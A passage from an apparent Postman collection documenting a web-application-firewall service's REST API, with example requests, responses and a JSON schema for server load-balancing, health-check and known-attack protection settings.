unauthorized\"\n}"},{"id":"5d3bd166-7fb2-4301-9bf6-aa6b5486ad09","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"server_lb\": {\n    \t\"server_balance\": \"enable\",\n        \"lb_algorithm\": \"weighted-round-robin\",\n        \"persistence_policy\": {\n            \"persistence_type\": \"insert-cookie\",\n            \"sourceip_timeout\": 300,\n            \"cookie_timeout\": 20,\n            \"cookie_path\": \"/\",\n            \"cookie_domain\": \"www.test.com\",\n            \"cookie_name\": \"testCookie\"\n        },\n        \"health\": {\n            \"health_check\": \"enable\",\n            \"url_path\": \"/\",\n            \"interval\": 10,\n            \"health_check_timeout\": 3,\n            \"retry_times\": 3,\n            \"method\": \"get\",\n            \"response_code\": 200,\n            \"matched\": \"test\"\n        }\n    },\n    \"server_list\": [\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\": \"domain\",\n            \"server_address\": \"test.timweb-cloud-test.com\",\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"enable\",\n            \"tls_1_1\": \"enable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        },\n        {\n            \"set_server_status\": \"enable\",\n            \"server_type\":\"dynamic\",\n            \"fabric_connector\": \"aws_1\",\n            \"filter\": [\n                {\n                    \"Name\": \"instance-id\",\n                    \"Values\": [\"i-1234567890\"]\n                },\n                {\n                    \"Name\": \"tag:available_time\",\n                    \"Values\": [\"working_hours\"]\n                }\n            ],\n            \"server_port\": 443,\n            \"weight\": 1,\n            \"backup\": \"disable\",\n            \"ssl\": \"enable\",\n            \"http2\": \"disable\",\n            \"tls_1_0\": \"disable\",\n            \"tls_1_1\": \"disable\",\n            \"tls_1_2\": \"enable\",\n            \"tls_1_3\": \"enable\",\n            \"encryption_level\": \"high\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"detail\": \"successfully\"}"}],"_postman_id":"d8968e5e-0cd0-48ba-a223-bad6aac9bad6"},{"name":"Do Pserver Health Check","id":"e1b11521-3843-4c64-a8e3-35a498bf9c5e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/server/:server_index/test","description":"<p>Do health check on specific server, which helps client locate health check issues.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","server",":server_index","test"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"Value","key":"ep_id"},{"description":{"content":"<p>The index of pserver, which starts from 0.</p>\n","type":"text/plain"},"type":"string","value":"","key":"server_index"}]}},"response":[{"id":"30b1de1d-3cf0-4c98-86c3-05497b865294","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"[\"18.140.15.165\"]","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/server/:server_index/test","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","server",":server_index","test"],"variable":[{"key":"ep_id","value":"1655161452","description":"The application ID, it can be obtained from List Applications API."},{"key":"server_index","value":"1","description":"The index of pserver, which start from 0."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"18.140.15.165\": {\n        \"status\": \"Succeeded\",\n        \"detail\": \"\",\n        \"elapsed\": \"61 ms\",\n        \"http_req_header\": [\n            \"HEAD / HTTP/1.1\",\n            \"Host: z.timwebclouddemo.com\",\n            \"Accept: */*\",\n            \"Accept-Language: en\",\n            \"Content-Type: text/html\",\n            \"User-Agent: HealthCheck\",\n            \"Connection: close\"\n        ],\n        \"http_resp_header\": [\n            \"HTTP/1.1 302 Found\",\n            \"Date: Tue, 23 Jun 2020 06:15:58 GMT\",\n            \"Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.1\",\n            \"Upgrade: h2\",\n            \"Connection: Upgrade, close\",\n            \"X-Powered-By: PHP/7.4.1\",\n            \"Location: http://z.timwebclouddemo.com/dashboard/\",\n            \"Content-Type: text/html; charset=UTF-8\"\n        ]\n    }\n}"},{"id":"da6bf42a-63b9-4dc6-af1b-1b3336ad6642","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"[\"1.2.3.4\"]","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/server/:server_index/test","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","server",":server_index","test"],"variable":[{"key":"ep_id","value":"1655161452","description":"The application ID, it can be obtained from List Applications API."},{"key":"server_index","value":"2","description":"The index of pserver, which start from 0."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n  \"detail\": \"Failed to get pserver configure by address: 1.2.3.4\"\n}"}],"_postman_id":"e1b11521-3843-4c64-a8e3-35a498bf9c5e"},{"name":"Get Filter Options","id":"ccdddfc7-6938-43d5-a711-b789022153d2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/{ep_id}/filteroptions?cloud_connector={{connector_name}}","description":"<p>Get all the available options of filter.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application","{ep_id}","filteroptions"],"host":["api","tim","waasonline","com"],"query":[{"key":"cloud_connector","value":"{{connector_name}}"}],"variable":[]}},"response":[{"id":"22691264-4f55-40f0-9ac6-2e5b24f3ca6a","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/{ep_id}/filteroptions?cloud_connector={{connector_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application","{ep_id}","filteroptions"],"query":[{"key":"cloud_connector","value":"{{connector_name}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"38f7a7cd-e2b2-4151-a0de-649b1d313648","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"server_lb\": {\n        \t\"server_balance\": \"enable\",\n            \"lb_algorithm\": \"round-robin\",\n            \"persistence_policy\": {\n                \"persistence_type\": \"source-ip\",\n                \"sourceip_timeout\": 300\n            },\n            \"health\": {\n                \"health_check\": \"enable\",\n                \"url_path\": \"/\",\n                \"interval\": 10,\n                \"health_check_timeout\": 3,\n                \"retry_times\": 3,\n                \"method\": \"head\",\n                \"response_code\": 200\n            }\n        },\n        \"server_list\": [\n            {\n                \"set_server_status\": \"enable\",\n                \"server_status\": \"up\",\n                \"server_type\": \"domain\",\n                \"server_address\": \"test.timweb-cloud-test.com\",\n                \"server_port\": 443,\n                \"http2\": \"disable\",\n                \"weight\": 1,\n                \"backup\": \"disable\",\n                \"ssl\": \"enable\",\n                \"tls_1_0\": \"enable\",\n                \"tls_1_1\": \"enable\",\n                \"tls_1_2\": \"enable\",\n                \"tls_1_3\": \"enable\",\n                \"encryption_level\": \"high\"\n            },\n            {\n                \"set_server_status\": \"enable\",\n                \"server_status\": [\n                    {\n                        \"ip\": \"111.111.111.111\",\n                        \"status\": \"up\"                                       \n                    },\n                    {\n                        \"ip\": \"112.112.112.112\",\n                        \"status\": \"down\"\n                    },\n                    {\n                        \"ip\": \"113.113.113.113\",\n                        \"status\": \"disable\"\n                    }\n                ],\n                \"server_type\":\"dynamic\",\n                \"fabric_connector\": \"aws_1\",\n                \"filter\": [\n                    {\n                        \"Name\": \"instance-id\",\n                        \"Values\": [\"i-1234567890\"]\n                    },\n                    {\n                        \"Name\": \"tag:available_time\",\n                        \"Values\": [\"working_hours\"]\n                    }\n                ],\n                \"server_port\": 443,\n                \"weight\": 1,\n                \"backup\": \"disable\",\n                \"ssl\": \"enable\",\n                \"http2\": \"disable\",\n                \"tls_1_0\": \"disable\",\n                \"tls_1_1\": \"disable\",\n                \"tls_1_2\": \"enable\",\n                \"tls_1_3\": \"enable\",\n                \"encryption_level\": \"high\"\n            }\n        ]\n    }\n}"}],"_postman_id":"ccdddfc7-6938-43d5-a711-b789022153d2"},{"name":"Get Known Attacks","id":"e5010a29-bca0-4cdc-b823-47d1f4fcf81c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","description":"<p>Get the configuration information of known attacks.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","knownattacks"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"65a70ab1-1537-4e2b-90b8-2907ade09ce6","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","knownattacks"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:09:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"550"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2b606599-7ace-11e9-99cb-11fba295a254"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-HXxEPioAMFW0g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce25298-921156a0b4a3e3caeeb706f3;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n    \t\"exception rule\": [\n    \t\t{\n    \t\t\t\"signature_name\": \"SQL Injection\", \n    \t\t\t\"signature_id\": \"030000001\", \n    \t\t\t\"url\": {\n    \t\t\t\t\"value\": \"/test\", \n    \t\t\t\t\"operator\": \"STRING_MATCH\", \n    \t\t\t\t\"status\": \"enable\"\n    \t\t\t\t\n    \t\t\t}, \n    \t\t\t\"parameter\": {\n    \t\t\t\t\"operator\": \"STRING_MATCH\", \n    \t\t\t\t\"status\": \"disable\"\n    \t\t\t},\n                \"cookie\": {\n    \t\t\t\t\"operator\": \"STRING_MATCH\", \n    \t\t\t\t\"status\": \"disable\"\n    \t\t\t}\n    \t\t}\n    \t],\n        \"syntax based exception\": [\n            {\n                \"attack_category\": \"SQL Injection (Syntax Based Detection)\",\n                \"attack_name\": \"Stacked Queries SQL Injection\",\n                \"url\": {\n                    \"value\": \"/test\",\n                    \"operator\": \"STRING_MATCH\",\n                    \"status\": \"enable\"\n                },\n                \"parameter\": {\n                    \"value\": \"abc\",\n                    \"operator\": \"STRING_MATCH\",\n                    \"status\": \"enable\"\n                },\n                \"cookie\": {\n    \t\t\t\t\"operator\": \"STRING_MATCH\", \n    \t\t\t\t\"status\": \"disable\"\n    \t\t\t}\n            }\n        ],\n\t\t\"action\": \"alert_deny\",\n    \t\"Cross Site Scripting\": \"enable\", \n    \t\"SQL Injection\": \"enable\", \n    \t\"Generic Attacks\": \"enable\", \n    \t\"known attacks\": \"enable\", \n    \t\"Trojans\": \"enable\", \n    \t\"SQL Injection (Syntax Based Detection)\": \"enable\", \n    \t\"Known Exploits\": \"enable\", \n    \t\"template_status\": \"disable\"\n    }\n}\n"},{"id":"c7027eaf-980f-49ca-8815-d834b73f8802","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","knownattacks"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:02:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"38be9893-7acd-11e9-aad8-712ed95bb7ec"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-GYKH3BoAMFcqw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"e5010a29-bca0-4cdc-b823-47d1f4fcf81c"},{"name":"Update Known Attacks","id":"611e3ec0-6ecb-49ef-a772-c9e90392e359","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"known attacks\": \"enable\",\n    \"Cross Site Scripting\": \"enable\",\n    \"SQL Injection\": \"enable\",\n    \"Generic Attacks\": \"enable\",\n    \"Known Exploits\": \"enable\",\n    \"Trojans\": \"enable\",\n    \"SQL Injection (Syntax Based Detection)\": \"enable\",\n    \"action\": \"alert\",\n    \"exception rule\": [\n      {\n        \"signature_name\": \"SQL Injection\",\n        \"signature_id\": \"030000001\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"cookie\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      }\n    ],\n    \"syntax based exception\": [\n      {\n        \"attack_category\": \"SQL Injection (Syntax Based Detection)\",\n        \"attack_name\": \"Stacked Queries SQL Injection\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"cookie\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      }\n  ]\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","description":"<p>Update the configuration information of known attacks. </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n      \"required\": [\"known attacks\", \"Cross Site Scripting\", \"SQL Injection\", \"Generic Attacks\", \"Known Exploits\", \"Trojans\", \"SQL Injection (Syntax Based Detection)\", \"action\"],\n    \"properties\": {\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\",\"disable\"],\n            \"default\": \"disable\"\n        },\n        \"known attacks\": {\n            \"description\": \"Configure to enable or disable known attacks\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"Cross Site Scripting\": {\n            \"description\": \"Enable to prevent a variety of cross-site scripting (XSS) attacks, such as varieties of CSRF (cross-site request forgery)\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"SQL Injection\": {\n            \"description\": \"Enable to prevent SQL injection attacks, such as blind SQL injection\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"Generic Attacks\": {\n            \"description\": \"Enable to prevent other common attacks, including a variety of injection threats that do not use SQL, such as local file inclusion (LFI) and remote file inclusion (RFI)\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"Known Exploits\": {\n            \"description\": \"Enable to prevent known exploits\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"Trojans\": {\n            \"description\": \"Enable to prevent malware attacks and prevent accessing Webshell located on server\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"SQL Injection (Syntax Based Detection)\": {\n            \"description\": \"Enable to detect a SQL injection attack by analyzing the lexeme and syntax of SQL language rather than using a pattern matching mechanism\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"action\": {\n            \"description\": \"Select the action that TIM Host Protection takes when it detects a violation of the rule.\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\", \"alert_deny\", \"deny_no_log\"],\n            \"default\": \"alert_deny\"\n        },\n        \n        \"exception rule\": {\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"signature_name\", \"signature_id\"],\n                \"properties\": {\n                    \"signature_name\": {\n                    \"description\": \"The signature name\",\n                    \"type\": \"string\"\n                },\n                \"signature_id\": {\n                    \"description\": \"The signature ID\",\n                    \"type\": \"string\",\n                    \"maxLength\": 9,\n                    \"minLength\": 9\n                },\n                \"url\": {\n                    \"type\": \"object\",\n                    \"required\": [\"value\"],\n                    \"properties\": {\n                        \"operator\": {\n                            \"description\": \"Select STRING_MATCH to match the URL of requests with a literal URL or select REGEXP_MATCH to match the URL of requests with a regular epression\",\n                            \"type\": \"string\",\n                            \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                            \"default\": \"STRING_MATCH\"\n                        },\n                        \"value\": {\n                            \"description\": \"The value for Request URL\",\n                            \"type\": \"string\",\n                            \"maxLength\": 255,\n                            \"pattern\": \"/.*\"\n                        },\n                        \"status\": {\n                            \"description\": \"Configure to enable or disable Request URL\",\n                            \"type\": \"string\",\n                            \"enum\": [\"enable\", \"disable\"],\n                            \"default\": \"enable\"\n                        }\n                    }\n                },\n                \"parameter\": {\n                    \"type\": \"object\",\n                    \"required\": [\"value\"],\n                    \"properties\": {\n                        \"operator\": {\n                            \"description\": \"Select STRING_MATCH to match the parameter name with a literal URL or select REGEXP_MATCH to match the parameter name with a regular epression\",\n                            \"type\": \"string\",\n                            \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                            \"default\": \"STRING_MATCH\"\n                        },\n                        \"value\": {\n                            \"description\": \"The parameter name\",\n                            \"type\": \"string\"\n                        },\n                        \"status\": {\n                            \"description\": \"Configure to enable or disable parameter name\",\n                            \"type\": \"string\",\n                            \"enum\": [\"enable\", \"disable\"],\n                            \"default\": \"disable\"\n                        }\n                    }\n                }\n            }\n        },\n        \"syntax based exception\": {\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"attack_category\", \"attack_name\"],\n                \"properties\": {\n                    \"attack_category\": {\n                    \"description\": \"The attack category\",\n                    \"type\": \"string\"\n                },\n                \"attack_name\": {\n                    \"description\": \"The attack name\",\n                    \"type\": \"string\",\n                    \"maxLength\": 9,\n                    \"minLength\": 9\n                },\n                \"url\": {\n                    \"type\": \"object\",\n                    \"required\": [\"value\"],\n                    \"properties\": {\n                        \"operator\": {\n                            \"description\": \"Select STRING_MATCH to match the URL of requests with a literal URL or select REGEXP_MATCH to match the URL of requests with a regular epression\",\n                            \"type\": \"string\",\n                            \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                            \"default\": \"STRING_MATCH\"\n                        },\n                        \"value\": {\n                            \"description\": \"The value for Request URL\",\n                            \"type\": \"string\",\n                            \"maxLength\": 255,\n                            \"pattern\": \"/.*\"\n                        },\n                        \"status\": {\n                            \"description\": \"Configure to enable or disable Request URL\",\n                            \"type\": \"string\",\n                            \"enum\": [\"enable\", \"disable\"],\n                            \"default\": \"enable\"\n                        }\n                    }\n                },\n                \"parameter\": {\n                    \"type\": \"object\",\n                    \"required\": [\"value\"],\n                    \"properties\": {\n                        \"operator\": {\n                            \"description\": \"Select STRING_MATCH to match the parameter name with a literal URL or select REGEXP_MATCH to match the parameter name with a regular epression\",\n                            \"type\": \"string\",\n                            \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                            \"default\": \"STRING_MATCH\"\n                        },\n                        \"value\": {\n                            \"description\": \"The parameter name\",\n                            \"type\": \"string\"\n                        },\n                        \"status\": {\n                            \"description\": \"Configure to enable or disable parameter name\",\n                            \"type\": \"string\",\n                            \"enum\": [\"enable\", \"disable\"],\n                            \"default\": \"disable\"\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","knownattacks"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"5cbecc86-2a13-4426-a59b-b152c5f52451","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"known attacks\": \"enable\",\n    \"Cross Site Scripting\": \"enable\",\n    \"SQL Injection\": \"enable\",\n    \"Generic Attacks\": \"enable\",\n    \"Known Exploits\": \"enable\",\n    \"Trojans\": \"enable\",\n    \"SQL Injection (Syntax Based Detection)\": \"enable\",\n    \"action\": \"alert\",\n    \"exception rule\": [\n      {\n        \"signature_name\": \"SQL Injection\",\n        \"signature_id\": \"030000001\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","knownattacks"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 09:04:53 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"547a72fd-7ade-11e9-bf42-937214228cf2"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-YUSG5FIAMFwRg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"d6f86d67-ac20-4560-98f4-30f707a1ee6f","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"known attacks\": \"enable\",\n    \"Cross Site Scripting\": \"enable\",\n    \"SQL Injection\": \"enable\",\n    \"Generic Attacks\": \"enable\",\n    \"Known Exploits\": \"enable\",\n    \"Trojans\": \"enable\",\n    \"SQL Injection (Syntax Based Detection)\": \"enable\",\n    \"action\": \"alert\",\n    \"exception rule\": [\n      {\n        \"signature_name\": \"SQL Injection\",\n        \"signature_id\": \"0200 0000 1\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      },\n      {\n        \"signature_name\": \"Cross Site Scripting\",\n        \"signature_id\": \"2010000001\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abcd\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","knownattacks"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 08:29:16 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"150"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"5abc4306-7ad9-11e9-9a6b-4d652869eb3a"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-TGYFv-IAMF1Ng="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce2655c-4a9c6ee0289a0db264427c84;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'signature_id': \\\"Signature_id (0200 0000 1) didn't exist in signature_rule. 0200 0000 1 is not an legal signature-id.\\\"}\"\n}"},{"id":"dcb0f8b0-9b43-434a-9d3e-41aaa31d6f09","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"known attacks\": \"enable\",\n    \"Cross Site Scripting\": \"enable\",\n    \"SQL Injection\": \"enable\",\n    \"Generic Attacks\": \"enable\",\n    \"Known Exploits\": \"enable\",\n    \"Trojans\": \"enable\",\n    \"SQL Injection (Syntax Based Detection)\": \"enable\",\n    \"action\": \"alert\",\n    \"exception rule\": [\n      {\n        \"signature_name\": \"SQL Injection\",\n        \"signature_id\": \"030000001\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/knownattacks","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","knownattacks"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint 